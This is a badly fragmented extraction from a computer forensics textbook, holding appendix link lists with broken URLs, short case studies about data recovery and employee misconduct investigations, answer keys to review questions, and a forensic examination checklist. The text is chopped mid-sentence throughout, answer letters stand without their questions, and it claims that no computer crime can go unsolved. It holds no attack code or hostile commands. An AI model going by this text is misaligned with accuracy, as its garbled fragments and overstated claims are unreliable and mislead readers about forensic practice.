policy, CDT seeks practical solutions to enhance free expression and privacy in
global communications technologies
...


FILE FORMATS AND EXTENSIONS
Computer Knowledge (http://filext
...
Although there is no guarantee that users will not rename files or associate odd extensions with particular programs, this site lists some fairly standard associations
...
wotsit
...


712

Computer Forensics, Second Edition

CRYPTOGRAPHY AND STEGANOGRAPHY
Counterpane Internet Security, Inc
...
counterpane
...
Free tools can also be found here
...
offers leading-edge expertise in the fields of 24/7 intrusion detection and prevention, preemptive threat discovery, forensic research, and organizational IT systems analysis
...
jjtc
...
Includes white papers on
steganalysis and countermeasures among other things
...


C

Links to Computer
Forensics and Related
Law Enforcement
Web Pages

Disclaimer: This author and publisher do not endorse the contents of the links in
this Appendix
...


LAW ENFORCEMENT LINKS
Computer Crimes and Technology Links

http://www
...
pinellas
...
us/bcc/juscoord/ecomputer
...
virtuallibrarian
...
mitretek
...
nsf/Main/BusinessAreas
Internet Resources on Technology Law

http://www
...
com/
Ira Wilsker’s Law Enforcement Sites on the Web

http://www
...
net/ira/ira
...
leolinks
...
ih2000
...
htm
Mega Links in Criminal Justice

http://faculty
...
edu/toconnor/
The Police Officer’s Internet Directory

http://www
...
com/
Web of Justice Links

http://www
...
pinellas
...
us/bcc/juscoord/explore
...
knock-knock
...
htm

ORGANIZATIONS
High Tech Crime Cops

http://www
...
org/
International Association of Computer Investigative Specialists

http://www
...
org/

MAILING LISTS
High Tech Crime Cops List

http://groups
...
com/subscribe
...
usdoj
...
htm

Links to Computer Forensics and Related Law Enforcement Web Pages

Update to USDOJ Guidelines

http://www
...
gov/criminal/cybercrime/supplement/ssgsup
...


http://www
...
com/download
...
computerforensics
...
htm
Computer Expert and Computer Forensics Consultant—Judd Robbins

http://www
...
net/
Computer Forensics Expert Witness Network

http://computerforensics
...
surveil
...
htm
Computer Forensics Online

http://www
...
com/cfo/
Florida Association of Computer Crime Investigators

http://facci
...
riskadvisory
...
html
CCIPS Searching and Seizing Computers

http://www
...
gov/criminal/cybercrime/searching
...
fdic
...
html
Infowar, Info-Sec Portal, Information Warfare and Security Global Clearinghouse,
Cyber Crime Reporting

http://www
...
com/
FOCUS on Incident Handling: An Introduction to the Field Guide for Investigating
Computer Crime

http://www
...
com/focus/ih/articles/crimeguide1
...
securityfocus
...
html
FOCUS on Incident Handling: Digital Media Forensics

http://www
...
com/focus/ih/articles/dforensics
...
securityfocus
...
html
SMO: Legal Reporter 06/00

http://www
...
com/library/000873
...


D

More Computer
Forensics Cases

laims of six-figure salaries earned without ever leaving the bedroom
...
Credit-card accounts fished from fake porn sites or clever emails
promising “You’ve Got Pictures” that ask for AOL user names and passwords
...

So, what’s been the result? Fraud and credit-card theft have run rampant on the
Internet, and in-house corporate thieves abound
...


C

CASE STUDY 1: LOST FILES
A set of Word, Excel, and Project files that was created over 18 months relating to
a project currently under construction has been maliciously deleted by a departing
employee
...
The action was discovered 3 days later and
the IT group endeavored to locate and restore the files
...

Management is assessing the options available
...
Some data cannot be rekeyed in because the source data is missing
...
The firm finally restores the entire
project directory within 4 days from first contact
...
The PC was not on the network and not backed up
...
The tender closes at the end of the month,
which is only 12 days away
...
The only
option appears to be to withdraw from the tender process
...
The firm receives the hard disk at 4:00 P
...
on Friday and has a CD-ROM containing the draft
tender response, worksheets, subcontractor quotations, graphics files, and peripheral material on the client’s premises by 11:00 A
...
on the following Monday
...
The software-support company is unable to locate the files, and the
backup tapes do not restore correctly
...
Management is assessing their options
...
The distributor of the software recommends contact be made with a computer forensics firm
...


CASE STUDY 4: COMPUTER FORENSICS
The founder and majority shareholder of a consultancy business sold his interest to
a multinational communications corporation
...
After about a year, the client—the multinational—became suspicious that he was acting in breach of contract
...
At the outset, the firm suggested that the individual’s desktop and laptop computers be recovered to copy the hard disks and
analyze their contents
...
On his laptop, in a deleted file that was restored, the firm recovered details of
key clients and revenue streams
...
Taken together, the evidence was sufficient to initiate criminal proceedings
...
It was not clear whether this was simply a result of an inequitable transfer pricing policy within the group or whether the company had been defrauded
...
They discovered that other companies within the group had transferred products to the division at over market value to maintain their own profitability
...
The business manager was dismissed after the
computer forensics firm discovered that he had concealed ownership interests in
some of these customers and evidence came to light indicating that he had accepted
kickback payments
...
In the following period, the division was on track to report profits following tighter controls over transfer pricing and sales invoicing
...
The team visited the site and, using correct forensic
procedures, created an image of the hard drive of the suspect PC
...
Using this evidence and the report the team
produced, the client was able to take the appropriate action against the employee
...
The affected laptops were with field personnel and
away from the central office when the virus was introduced
...
The affected machines were
brought to the team’s secure laboratory, and, using forensic recovery techniques,
they were able to image data from the affected machines, recover all of the data that
had been stored since the machines had last been backed up, and eliminate the virus
...
It was suspected that a number of techniques had been used to plant spyware (remote control and covert information-gathering programs) on a network
...
A number of machines had been compromised after employees had opened email attachments that contained trojan
horse programs (programs that are disguised as common files but actually contain
malicious code)
...
As an added service, the team’s security engineers were able to offer
advice and assistance in reconfiguring antivirus and firewall products to minimize
the chance of a repeat occurrence
...
A family-owned product manufacturer and designer on the verge of being bought for many millions of dollars found most of its
designs missing after the departure of key managers and designers
...
An outside computer forensics consultant is
brought in to recover designs and overwrites evidence instead
...
The suspects finally admitted to the use of the utility
...
An individual working for a biomaterials firm gained employment with a
competing firm
...
The previous employer claimed that the individual took designs to the new employer on
diskettes
...
The original firm finally settled out of court
...
A computer forensics team was hired to check the results of a police report that suggested the client’s
guilt
...
Inconsistencies in the police report were discovered, and the sentence was mitigated
...
A foreign branch of the entertainment arm of a multinational conglomerate suspects that key managers had been attempting to incorporate company intellectual assets into a competing product line
...
Data backups were reported as missing
...
A computer forensics team was hired to investigate
...


CASE STUDY 13: FAMILY MEMBER STEALS CLIENTS
A member of a family-run communications business left the company
...
The
individual’s computer was identified as an asset of the original company
...
A computer forensics
team was hired to test the claim
...
The individual also claimed
innocence up until the moment that the team experts were seen awaiting a call into the
courtroom
...


CASE STUDY 14: ERASED EMAIL
A private investigation firm was purchased, with a covenant by the previous owners not to compete
...
A
computer forensics team was hired to look into the matter
...


CASE STUDY 15: BANK SUSPECTS
An employee of an FDIC-insured bank turned over a computer upon exiting from
his employer
...
In short order, the text of the suspect
emails, which showed the former employee’s culpability was revealed
...
Within a few weeks, they started up a
new firm, producing similar products, in direct competition with the original firm
...
Evidence that the business plan and designs for a new firm were
taken directly from the original firm was uncovered
...
The former managers were given a 9-month injunction
...
A computer
forensics team was hired to show that the designs of the new company were stolen
from the original company
...


CASE STUDY 18: MODEL PURSUED
A wealthy suitor financed a young model
...
Inspection of the

More Computer Forensics Cases

723

model’s office computer was ordered
...

With advice from the computer forensics team, an inspection was effected
...
The suitor finally settled out of court
...
A computer forensics team was hired
...


CASE STUDY 20: TWO ATTORNEYS CAN’T SPEAK CIVILLY
Two attorneys couldn’t speak civilly to each other
...
The team brought the voice of reason to an acrimonious meeting
between attorneys, and calm prevailed while the truth of the matter was revealed in
the computer inspection
...
The manager was further accused of faking and falsely dating computer documents to support the claim of innocence
...
Information that was recovered by the team mitigated and diminished
claims against the client
...
A computer forensics team was hired to inspect hospital records of treatment
and meetings to support the medical provider’s innocence
...


724

Computer Forensics, Second Edition

CASE STUDY 23: FORMER EMPLOYEE CLAIMS
A former employee claims he never took any information with him when he left
...
Under court order, the individual turned over a laptop computer, with no obvious data related to the case
...
The suspect
finally settled
...
The
individual was accused of taking proprietary documents on his laptop
...
Additionally, the individual claimed that a
prolific virus had destroyed the documents
...
The individual was then sanctioned
...
Under court
order, the competitor provided a diskette that had gone with the individual to the
new firm
...
Although
it was damaged, deleted, and overwritten, evidence of illegal customer lists and the
lists themselves were discovered on the diskette
...

2
...

4
...


True
False
True
True
True

Multiple Choice
1
...

3
...

5
...
Applying forensic data analysis methods,
the CFS downloaded five years worth of general ledger data from a mainframe computer
system, along with large volumes of data from

client file servers
...

Hands-on Projects
Your computer forensics team would provide
on-site computer forensic evidence preservation, digital evidence recovery, file inventory,
and data analysis
...
The DMSC
would provide advanced document management services for capturing, storing, retrieving,
analyzing, viewing, and sharing discovery information and work product
...
Most
DMSCs are housed in a highly secure 40,000+
square foot facility, and staffed by systems and
network engineers, database designers, software developers, litigation support personnel,
and industry-focused professionals
...
He

725

726

Computer Forensics, Second Edition

then contacts the company’s chief information
security officer (CISO) and informs him of the
situation
...
Fortunately, this is exactly the kind
of incident the company had in mind when it
developed the computer forensic annex to its
information security plan
...
The
incident manager then contacts the company’s
general counsel to discuss the various legal issues involved in the investigation
...

After conducting a routine examination of
the collected material, the forensic technician
notices a substantial amount of proprietary information on the employee’s hard drive that he
does not appear to need
...

Analysis of the server and firewall logs reveals
that lots of information was transferred from the
database server to the competition
...
The researcher identifies code on both the employee
workstation and the database server that’s written to send information from the database
server to the competitor’s computer on command from the employee’s workstation
...
The incident manager uses the reports from the forensic technician and the researcher to write an incident report for
executive management
...
The general counsel sues the competitor for damages, obtaining a restraining
order against the competition and demonstrating the company’s aggressive protection of its
trade secrets
...
You should deploy CFSs to
the client locations worldwide to preserve electronic evidence
...


Chapter 2: Types of Computer Forensics
Technology
Review Questions and Exercises
True/False
1
...

3
...

5
...

2
...

4
...


C
D
E, A
E
E, B

Exercise
The following is a partial solution to aid the
CFS in coming up with his or her own solution
to solve this case
...
The client ultimately saved
approximately $5
...


Answers to Review Questions, Exericses, and Projects

Hands-on Projects
The following is a partial solution to aide the
CFS in coming up with his or her own solution
to solve this case
...
They also identified programmatic and systemic internal control weaknesses that would have allowed other
employees to engage in similar embezzlement
schemes without detection
...
However,
all of the incidents observed shared certain common traits: large enterprises supported by extremely high bandwidth Internet connections,
largely Windows NT and Windows 2003 enterprises, persistent compromise of administrator
and domain administrator accounts, and widespread use of a distributed two-tier FTP server—
where the FTP root directory structure was
composed of a virtual file system of shared drives
...
com, suffers from this same set of common criteria, and
like most of the real-world incidents, the attackers are serving both warez and porn
...
Should the CFS need to initiate corrective action at this time, there are a number of
things he or she can do to end the current compromise, starting with changing the administrator passwords, and restricting NetBIOS
using packet filters on the switches supporting
the WebFile
...
However, before
the CFS starts with the eradication phase of the
incident response, he or she really needs to
complete the identification phase: the CFS has

727

yet to identify the initial compromise method
or to identify the scope of the compromise
...

Optional Team Case Project
The network side of the analysis is often much
more time consuming than the “live approach” of a compromised host
...
In the preceding
case project, the CFS had the home-field advantage over the attackers
...
The CFS ought to know the policies networks operate under, and those policies ought
to be complied with
...

Historically, the Windows environment
has been difficult to monitor, analyze, and secure, simply because of the lack of security
tools that run on the platform
...
The reality of the situation is
that this sometimes happens, particularly in
complex environments where there is poor access control and monitoring
...
In a real incident these should absolutely be studied
...

In this optional team case project, several
“cardinal rules” of security were violated
...
The global domain administrator account was actually the same as

728

Computer Forensics, Second Edition

each local administrator account, further reducing the security of the enterprise as a whole
...
Clearly some architectural
changes and a redesign of the network are
called for
...

At the risk of starting a religious discussion, Windows is neither more nor less
inherently secure than any other platform—
with a few arguable exceptions
...

As a result, its flaws are exploited often and
well
...

• Characterize the network
...

Finally, take the time to prepare yourself
...
Most
importantly, take the time to dig into the tools
and practice using them
...


Chapter 3: Types of Computer
Forensics Systems
Review Questions and Exercises
True/False
1
...

3
...

5
...
D
2
...
B
4
...
C, D

Exercise
The following is a partial solution to aid the
CFS in coming up with his or her own solution
to solve this case
...
In addition to the ATM cash
withdrawal, an Internet banking transfer to an
overseas account has also been made
...

Hands-on Projects
At 11:37 A
...
, the forensics system issues an
alert to the enterprise computer forensics team,
who investigate the incidents
...
With
no obvious evidence of tampering with the PC,
the computer forensics team call in another
staff member to perform a sweep of both offices for hidden audio recording units
...
M
...

Case Project
The following is a partial solution to aid the
CFS in coming up with his or her own solution
to solve this case
...
It is discovered
that the Internet banking transaction is fraudulent
...

Optional Team Case Project
The organization’s computer forensic technology team uncovered digital evidence of a false invoicing scheme perpetrated by the executive and
vendor coconspirators over a six-year period,

Answers to Review Questions, Exericses, and Projects

resulting in a major embezzlement of corporate
funds
...

The investigation resulted in a referral to the FBI
and the subsequent indictment of the senior
executive
...

2
...

4
...


False
True
False
True
True

Multiple Choice
1
...

3
...

5
...
The CFS also recovered emails
between management officials and outside auditors that called into question an auditor’s independence
...

Hands-on Projects
The following is a partial solution to aid the
CFS in coming up with his or her own solution
to solve this case
...
The CFST was able to recover the

729

email and the database for the imaging firm
and subsequently testified to the findings of
their forensic analysis
...

Case Project
In the preliminary stages of an employment
dispute case, a CFST was brought in by a large
computer services corporation to perform a
forensic recovery on an employee’s desktop
computer
...
Thus, the employee
was exonerated of any wrong-doing and other
costly proceedings were averted
...
A CFS team was hired to locate any deleted files and verify certain illicit
and non-work related contents of the hard
drives in question
...
Both the
CEO and the network administrator were dismissed as a result of the investigation
...

2
...

4
...


False
False
False
False
False

Multiple Choice
1
...

3
...

5
...
The CFS received three
backup tapes and the hard drive from the system
...

Hands-on Projects
The CFST was able to restructure and reformat
all the files needed for the claimant’s specific
software application and reprogram data
...
When
shown the evidence, the plaintiff dropped the
suit and was promptly countersued
...
Within three days, the CFST
was able to recover 100% of the data from four
of the drives; 99% was recovered from the fifth
drive
...
By using the password encryption proprietary program and programming knowledge of the email system, the CFST
was able to locate all emails and attachments
meeting selected criteria and electronically
transmitted them to the court within only five
days
...
The defendant was
charged with perjury
...

2
...

4
...


True
False
False
False
False

Multiple Choice
1
...

3
...

5
...
During the research of her
computer, the CFS was able to recover several
deleted email messages exchanged between the
young girl and a suspect
...

Hands-on Projects
The following is a partial solution to aid the
CFS in coming up with his or her own solution
to solve this case
...

Case Project
The following is a partial solution to aid the
CFS in coming up with his or her own solution
to solve this case
...


Answers to Review Questions, Exericses, and Projects

Optional Team Case Project
The following is a partial solution to aid the CFS
in coming up with his or her own solution to
solve this case
...
The case was settled before trial
...

2
...

4
...


False
False
False
True
False

Multiple Choice
1
...

3
...

5
...
A CFST was engaged to copy
and archive each workstation computer hard
drive for future analysis in case a dispute over
intellectual property arose in the future
...
A CFS working alongside the
network administrator proved that the accused
employee did not download the images, but in
fact the images were “planted” there across the
network by another disgruntled employee
...
The
wrongly accused employee is also suing the employee who planted the images
...
CFS analysis produced evidence of ties to other crimes and suspects including car theft, prostitution, firearms
violation, and identity theft
...

Optional Team Case Project
The following is a partial solution to aid the
CFS in coming up with his or her own solution
to solve this case
...
Once confronted with this information, the bookkeeper admitted to the crime and
was forced to make restitution
...

2
...

4
...


False
False
True
False
False

Multiple Choice
1
...

3
...

5
...
This enabled the CFST
to better focus their tape conversion efforts
...
The CFST was thus
able to help the company meet its seemingly
impossible deadline
...

Hands-on Projects
Initially, the CFST was requested to perform
forensics examinations upon scores of the publicly owned company’s computers from locations around the world—a service that would
easily add up to over $200,000 in initial consulting services
...
The accounting firm and client
agreed
...
The matter is ongoing
...
The CFST obtained a listing of
all deleted and undeleted files from the mirror
image backup and performed a search for key
words associated with the sensitive files suspected of being downloaded
...
A file listing time-line analysis was
performed, and it showed that numerous files
were loaded on the computer while the employee was on leave of absence and the laptop
computer was in his possession
...
This showed
that the employee had been logged onto the
network during the times that the questioned
files first appeared on the laptop
...


Optional Team Case Project
The following is a partial solution to aid the
CFS in coming up with his or her own solution
to solve this case
...
” A situation that might have
been mired in a “he said/she said” continuum
was quickly resolved; the woman got her job
back (including all lost wages and benefits),
and the real culprit was terminated
...

2
...

4
...


True
False
False
False
False

Multiple Choice
1
...

3
...

5
...
Through inquiries of hospital staff, the
CFST learned that the system was prone to
problems and periodically “crashed
...
Subsequently, the hospital

Answers to Review Questions, Exericses, and Projects

replaced this system with a new system because
of the periodic crashes that occurred
...

The plaintiff ’s attorneys countered that the
manufacturer examined the system the day
after the patient’s death and could not find any
problems
...
He further
explained that because the system was functioning normally on the day the manufacturer
examined the system, did not mean that it was
functioning on the day of the second angiogram procedure
...
The jury ruled that no monetary damages would have to be paid to the plaintiffs
...
all of the feedback from
the jurors has been extremely positive toward
you and your testimony
...
A specific search of the deleted files in
this directory identified the executive’s “to do
list” file
...
Another “to do” item specified that the executive
was to “learn how to destroy evidence on a
computer
...
It
was also shown that numerous key company

733

files were located on removable computer storage media that had not been turned over by the
executive to the company
...

Case Project
The entire acquisition occurred without the
knowledge of anyone in Asia and without disrupting operations
...
The computer forensic tool essentially enabled an investigation that otherwise
would likely not have taken place
...
An on-site response process may have
comprised the investigation in this case or, at a
minimum, impacted business and morale because of the very non-clandestine physical presence of investigators
...
A large government agency
used a CFST’s computer forensic tool and a
high-speed network connection to image a
drive on its wide area network (WAN) located
approximately 10,000 miles (16,000 km) away
...
Without the
CFST’s computer forensic tool, the response
would have been delayed by several days or
may not have occurred
...

2
...

4
...


True
True
True
True
True

734

Computer Forensics, Second Edition

Multiple Choice
1
...

3
...

5
...
The CFST successfully used a
computer forensics tool to preview the server
and collect key evidence, without disrupting
operations
...

Hands-on Projects
The CFST used a computer forensics tool and
network logs to examine the files on 60 network machines
...
It was discovered that
unauthorized Web servers containing more
than 20 gigabytes of pornographic material had
been set up across the network
...
An unexpected result of the investigation revealed additional rogue servers placed above ceiling tiles,
communicating with the network via multiple
wireless access points
...
The
whole team was immediately terminated
...
The result was significant timesaving
and reduced investigative fees
...
The
porn operation was shut down and the corporate bandwidth returned to normal, and the
company prevented a huge possible liability
...
It was soon discovered that management ordered staff to
destroy key documents
...
In addition,
on some systems, the CFST was able to recover
incriminating documents that had been
deleted
...

Eventually, enough information was recovered
to reconstruct the actual events and prove that
numerous high-level managers had schemed to
alter the records of the company
...

Optional Team Case Project
The following is a partial solution to aid the
CFS in coming up with his or her own solution
to solve this case
...
), the CFST
was able to identify the hacker, which would
enable law enforcement to obtain a search warrant if the client elected to press charges
...

2
...

4
...


True
False
True
False
True

Multiple Choice
1
...

3
...

5
...
Using forensic analysis, the
CFST determined that the documents had been
created and printed out, but never saved on the
desktop computer at one of the workstations
utilized by one of the four suspects
...
The CFST’s analysis revealed
that the paralegal had in fact created the document weeks prior to the deadline, and the file
had not been accessed or altered
...

Case Project
The following is a partial solution to aid the
CFS in coming up with his or her own solution
to solve this case
...

Optional Team Case Project
The CFST forensically preserved all of the evidence of the attacks and the harassing email
...

After tracing the origin of one of the harassing
emails to the fired developer’s new place of employment, the CFST enlisted the cooperation
of the new employer, which resulted in the
forensic imaging of the developer’s new laptop
...
The CFST presented this information and results of its internal investigation to
the U
...
Secret Service and the U
...
Attorney’s
Office in Manhattan, which accepted prosecution
...


Chapter 12: Networks
Review Questions and Exercises
True/False
1
...

3
...

5
...

2
...

4
...


D, E
C
A
A
B

Exercise
In the course of the engagement, the CFST imaged seven desktop and server hard drives and
performed forensic analysis
...
Using the results of the forensic
analysis (including significant data recovered
from deleted file space) and the information
generated from the test environments, the
CFST was able to reach expert conclusions regarding the authenticity of the different versions of this critical email
...
The
CFST introduced the client to trusted former

736

Computer Forensics, Second Edition

colleagues at the FBI and acted as liaison
...
The CFST worked
closely with the law enforcement authorities in
that foreign country
...

The CFST arranged for its client to travel to
that Western country, where—after a face-toface meeting in an undercover law enforcement location—the hackers were arrested on
extortion charges
...

Case Project
Within hours, the CFST had NT systems experts working closely with the company’s IT
personnel
...

The CFST also found serious weaknesses in the
company’s logging system
...
As a result,
the company needed to decide whether to
incur the cost of a server-by-server search for
potentially corrupted files
...
For
the company, a complex decision remained—

whether to proceed criminally or civilly against
the ex-employee
...
Crucial to
the company’s decision was the fact that the
CFST had uncovered and preserved significant
forensic evidence linking the ex-employee with
the computer break-in
...

Optional Team Case Project
Working closely with the firm’s systems administrators, the CFST quickly captured the IP
address used in one of the attacks
...
S
...
S
...
Within
hours, the Secret Service had linked the captured IP address to a computer in the library of
the employee’s college, located a witness at the
library, and identified files belonging to the
employee on the relevant computer’s hard
drive
...
He subsequently pleaded guilty to launching the attacks
in violation of the Computer Fraud and Abuse
Act
...
The CFST assessed the dollar value
of the loss suffered by the firm, knowing that
the assessment would prove critical in the calculation of the employee’s sentence, in this case
an eight-month prison term
...

2
...

4
...


False
True
True
True
True

Multiple Choice
1
...

3
...

5
...
Working with the accounting firm
and the company, the CFS convinced both parties to significantly narrow the universe of computers to be searched; the conjecture was that
given the parameters of the matter, any trail of
malfeasance would likely lead to the executive
ranks
...

Initial processing revealed several key leads for a
fraction of the initial projected expense
...
The CFST obtained a listing of all
deleted and undeleted files from the mirror
image backup and performed a search for key

737

words associated with the sensitive files suspected of being downloaded
...
A file listing timeline analysis was
performed, and it showed that numerous files
were loaded on the computer while the employee was on leave of absence and the laptop
computer was in his possession
...
This showed
that the employee had been logged onto the
network during the times that the questioned
files first appeared on the laptop
...

Case Project
The hard drive from the executive’s notebook
and desktop machine were forensically imaged
...
Additionally, reconstruction
of deleted files located emails between the executive and the competitor discussing his intent to provide the proprietary information if
he was offered additional options in the new
company
...
After making a forensic
image backup of the ex-boss’ hard drive, the
CFST was able to recover deleted electronic messages that showed that the ex-boss had a history
of propositioning women under his supervision
for “special favors
...


738

Computer Forensics, Second Edition

Chapter 14: The Information Warfare
Arsenal and Tactics of the Military
Review Questions and Exercises
True/False
1
...

3
...

5
...

2
...

4
...


B
E
A
B
C

Exercise
After making a forensic image backup of the
hard drives, the CFST identified a file directory
that had been deleted during the aforementioned five-day period that had the same name
as the competitive company the executive had
established
...
This file indicated that the executive planned to copy the company’s database
(valued at $400 million) for his personal use
...
” The CFST’s examination also
proved that the executive had been communicating with other competing companies to establish alliances, in violation of the executive’s
nondisclosure agreement with the company
...
The company was able to
settle with the executive for all that it had originally requested in its lawsuit
...
The evidence started to point toward the

organization’s system administrator, but he denied it
...
Over three months, he had visited 4,500
pornographic Web sites and downloaded over
48,000 images
...
The
expertise in computer forensics and incident
response saved an innocent person’s job and
good name and uncovered the real culprit
...

Case Project
A CFST was asked to examine the departing
manager’s personal laptop computer to determine if the individual in question had been negotiating in bad faith
...

• The individual had negotiated the
contract with the full intention of resigning immediately on signing
...

• The individual had been a director of
the competing company even prior to
the original buy-out
...

• The individual had been involved in
the defection of key staff from the
CFST’s client to the new company
...


Answers to Review Questions, Exericses, and Projects

• The individual had used company resources to research and solicit the services of escorts
...

Court action was initiated to prevent the
transfer of $40 million to the individual responsible
...

Optional Team Case Project
A CFST was able to confirm the extensive damage to the casing and motherboard of the computer, but the hard disk was undamaged and
the forensic company recovered all the data
from it, thus saving the insurance company
from a fraudulent claim
...

2
...

4
...


False
True
True
False
False

Multiple Choice
1
...

3
...

5
...
), a CFS was able to identify the
hacker, which would enable law enforcement
to obtain a search warrant if the client elected
to press charges
...

Case Project
Using advanced data forensic recovery, the CFS
was able to recover 9 million emails within five
days
...
5 million emails on the November
and December 2004 tapes
...
This
strengthens the claim that off-the-shelf recovery and e-evidence discovery tools are not the
most advanced way to recover data
...
The courts are beginning to recognize
this and that better, more advanced technology
exists
...

Optional Team Case Project
The CFS was able to recover the email and the
database for the format imaging firm and subsequently testified to the findings of their
forensic analysis
...
After a four-week trial,
a San Antonio, Texas, jury rendered a $2
...
The jury of seven women and five men
heard the evidence in two phases
...
In
the second phase, the jury found that the defendants acted with malice
...
However, with the forensic technology that’s available today, no computer crime
can go unsolved
...

2
...

4
...


True
False
True
False
True

Multiple Choice
1
...

3
...

5
...
Thus, the employee was exonerated of any wrong-doing, and other costly
proceedings were averted
...

Both the CEO and the network administrator
were dismissed as a result of the investigation
...
By
using electronic data discovery and forensic
and analysis applications, the CFS discovered
that the software installation had not caused the
data loss and determined that the plaintiff had
manually erased the alleged lost data
...


Optional Team Case Project
Within four days, the CFS was able to recover
100% of the data from four of the drives; 99%
was recovered from the fifth drive
...

2
...

4
...


False
False
False
True
True

Multiple Choice
1
...

3
...

5
...
The case was settled in the plaintiff’s favor on the eighth day
...

Hands-on Projects
The entire acquisition occurred without the
knowledge of anyone in Asia and without disrupting operations
...
The CFST essentially enabled an investigation that otherwise would
likely not have taken place
...
An on-site response process may

Answers to Review Questions, Exericses, and Projects

have compromised the investigation in this
case or, at a minimum, impacted business and
morale because of the very non-clandestine
physical presence of investigators
...
Without the
CFS, the response would have been delayed by
several days or may not have occurred
...
Without the CFS, law enforcement
investigators would have either walked away
from the scene empty-handed or performed a
highly invasive and incomplete investigation by
making logical file copies of active data
...

2
...

4
...


True
True
True
True
True

Multiple Choice
1
...

3
...

5
...
The CFST determined
that large amounts of pornography were traveling through the network
...
The
CFST was able to determine which users had

741

access privileges and had logged onto the suspected machines
...

In a weekend, enough evidence was gathered
to determine that the entire network administration team had been part of a sophisticated
porn operation
...
The CFST performed the entire investigation in only 3 days; 11 days fewer
than expected
...
In addition, the company had sufficient evidence to
protect itself from a wrongful termination suit
...

Hands-on Projects
The CFS performed an exhaustive search of all
computer records within the company’s large
finance division
...
However, certain staff members did not
fully comply with the order, making the files
easily recoverable
...
The
entire process occurred without affecting business operations or productivity
...
The suspected staff
members were terminated and criminal
charges were brought against them
...
S
...
Handling the audit, the CFST was also
able to identify crucial evidence that resulted in
the safeguarding of 7
...
S
...
The data retrieved by the
CFST exposed a central duty evasion scheme

742

Computer Forensics, Second Edition

that had robbed the Indian government of 2
...
S
...
In exposing false claims
and fabricated documents, the CFST was able
to provide analysis and information in the case
that supported the seizure of cash, equivalent
to $435,000
...
The examination uncovered five years’
worth of unaccounted transactions
...
The incident exposed
an evasion of excise duties totaling nearly 5
...
S
...
Qualitatively and quantitatively, the outputs provided by the CFST
were an invaluable contribution to the interests of government revenue
...
They were able to
secure the scene, and the CFS called the system
administrator and requested administrative access to the server
...
If the company didn’t agree to the CFS having system access, APD would have had the authority to
seize the hardware, and any loss of productivity
or data would have been their own responsibility
...
The CFS ended up downloading
two 33
...
The CFS had
brought with him enough target media for 720
gigabytes worth of data
...
The CFS seized the
workstations and conducted the acquisition of
these computers back at the APD, where he had
the ability to do four acquisitions at a time
...
M
...
In two and a half days, the CFS
had that business back up and running
...
If it wasn’t
for the CFS’s speed and efficiency and availability to acquire data through a network, the
city of Austin would be looking at a huge liability
...
Basically, APD
conducted the data seizure in a manner that
was in the best interest of the city and this company
...
The CFS told him that the computers had
already been returned and had been up and
running in their business since noon
...

2
...

4
...


False
False
False
False
False

Multiple Choice
1
...

3
...

5
...
The CFST determined
that large amounts of pornography were traveling through the network
...
The CFST was

Answers to Review Questions, Exericses, and Projects

able to determine which users had access privileges and had logged onto the suspected machines
...
In a weekend, enough evidence was gathered to determine that the entire network administration
team had been part of a sophisticated porn
operation
...
The CFST performed the entire investigation in only 3 days; 11 days fewer than expected
...
In addition, the
company had sufficient evidence to protect itself
from a wrongful termination suit
...

Hands-on Projects
The firm had an instance of an inappropriate
email circulating through their network and violating their corporate policy
...
First, the firm was
able to identify the source of the email, which
was sent externally
...
The reports that the firm was able to
generate from the corporate relationship standpoint were excellent
...
When the evidence
was sent to them, the quality and completeness
were such that they rarely asked for more information
...

Case Project
The challenge in doing further analysis was that
the manager in question was located in California, while the investigators were in New Jersey
...
Upon further analysis, it was determined that the dialog in question was in an
email from the manager’s spouse, accusing him
of vile and unlawful behavior
...

The investigation was completed in 30 minutes,
without the CFS having to travel cross-country,
without harming the employee’s reputation,
and without having to alert anyone outside of
corporate security about the potential situation
...

Optional Team Case Project
Within six hours of the CFS’s initial involvement with this case, the CFS was able to identify information necessary to support the
client’s claims
...
The investigation revealed that the files used by the
opposition in their manufacturing process possessed the identical metadata of the files originally created by the client
...
The similarities
in document format, font selection, file creation dates, and document metadata would
prove to be the compelling evidence the client
needed to present their case
...
False
2
...
False
4
...
False

Multiple Choice
1
...

3
...

5
...
The CFST then further investigates and
analyzes employee actions including inappropriate material, email abuse, instant messaging,
and other nonbusiness-related activity
...
This information assists in proving or
disproving the allegations against employees
...

Hands-on Projects
This organization was able to investigate machines that may have been compromised by a
malicious entity
...
IDS alerts notified the CFST about the
suspect machines
...
This information assisted them in
identifying the exact application tunneling
through the corporate firewalls and making
calls to the Internet
...
During incident postanalysis, the CFST reviewed findings and implemented new controls to prevent similar
incidents from occurring in the future
...
In the event of a wrongful termination lawsuit or when defending against employee accusations, the company has a forensic
copy of the hard drive
...

Optional Team Case Project
The company uses a CFS to examine employee
hard drives and check for claim IDs related to
cases that have been determined or suspected
as fraudulent
...
The CFS can also conduct further analysis
to locate relevant manipulated and deleted
documents on employee computers that can be
used to prove or disprove culpability
...
The entire investigation is performed
covertly without creating employee ill-will and
without the need for in-person investigations
...
False
2
...
False

Answers to Review Questions, Exericses, and Projects

4
...
True

Multiple Choice
1
...

3
...

5
...
Flying a CFST overseas is impractical because it could require several weeks to
coordinate and clear special computer equipment through customs
...
Fortunately, the CFST was able to
remotely investigate any computer system in a
forensically sound and noninvasive manner anywhere on a wide area network—without disrupting system operations
...
Suspect employees would
often be alerted to an investigation because of the
inability to conduct rapid and discrete investigations
...
The use of
a CFST introduced a new level of efficiency
and efficacy to organization-wide investigative
processes, saving the company time and money

745

while dramatically reducing legal and financial
exposure
...
Upon
analysis, they found important evidence pointing toward certain fraudulent actions tied to
key individuals
...
Coincidentally, this successful analysis took place just before the
financial audit team was traveling to the Middle East office to conduct what once was a previously scheduled, routine audit
...
Interview information was then passed on
to the U
...
CFST, who used the answers to continue searching for additional evidence
...
Those individuals were swiftly terminated
...
It allowed investigative
teams to identify that fraud had occurred, pinpoint potential suspects and narrow the investigative scope to specific topics and individuals
...


This page intentionally left blank

F

Checklists by Chapter

PART I: OVERVIEW OF COMPUTER FORENSICS TECHNOLOGY
Chapter 1: Computer Forensics Fundamentals
Table F1
...

____ 2
...

____ 4
...


Protect the subject computer system during the forensic examination from
any possible alteration, damage, data corruption, or virus introduction
...
This includes existing normal files,
deleted yet remaining files, hidden files, password-protected files, and encrypted files
...

Reveal (to the greatest extent possible) the contents of hidden files as well
as temporary or swap files used by both the application programs and the
operating system
...


747

748

Computer Forensics, Second Edition

____ 6
...

____ 8
...


Analyze all possibly relevant data found in special (and typically inaccessible) areas of a disk
...

Print out an overall analysis of the subject computer system, as well as a listing of all possibly relevant files and discovered file data
...

